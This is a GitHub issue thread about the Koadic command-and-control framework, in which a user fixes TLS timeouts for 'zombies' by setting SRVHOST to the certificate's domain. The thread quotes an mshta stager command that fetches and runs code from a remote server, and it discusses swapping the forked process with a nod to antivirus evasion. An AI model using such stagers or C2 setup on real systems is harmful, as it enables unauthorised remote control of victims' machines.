### ISSUE TITLE
Koadic timeout with Letsencrypt certificates

### ISSUE THREAD

**Issue by pentestitde** [zerosum0x0/koadic#110]
I'm trying to run an external server using Letsencrypt certificates. What I have done so far:

- registered a domain
- setup Letsencrypt certificate for the domain and copied it to the server
- install koadic 
- create autorun file with Port 443, CERTPATH, KEYPATH, ENDPOINT
- starting Koadic with autorun settings

When I use the payload mshta https://mydomain/endoint, I'm getting a Zombie immediately, but it times out after some seconds.

The certificate is correct. I checked it on the website without errors. 

Koadic runs fine without certificate. I'm getting stable zombies.

**Comment by pentestitde** [comment]
Additional info here:
![cert0](https://user-images.githubusercontent.com/44206580/60756071-26e92f00-9ff9-11e9-9fa6-93ec1b74ef27.png)
![cert0](https://user-images.githubusercontent.com/44206580/60756073-2c467980-9ff9-11e9-941d-be3e0163c0f3.png)

**Comment by TheNaterz** [comment]
Hmmm that's interesting, I'll do some experimenting tomorrow. The problem is with the rundll32 forked process. We've seen in the past that when we use rundll32 to reach out to an IP/hostname, it doesn't respect any system proxies in place. Now, it seems like the TLS can't be negotiated correctly.

A temporary fix would be to change the forked process. We know the mshta process is working fine because you're getting that initial connection. I've never tested this (for some reason?), but theoretically it should work. AV might flare up, not sure though.

Change this line:
https://github.com/zerosum0x0/koadic/blob/6f6babe998642aa71e2165dd36804b5fddb0a8d2/modules/stager/js/mshta.py#L18

To this:
`self.forkcmd = self.loader.load_script("data/stager/js/mshta/mshta.cmd")`

**Comment by zerosum0x0** [comment]
Your SRVHOST is an IP. Set it to the domain name of the certificate.

**Comment by TheNaterz** [comment]
Oh lol, I didn't even see that. Good catch.

**Comment by pentestitde** [comment]
I added "set SRVHOST Domain_name" in the autorun script. It works like a charm! Thanks for your help!
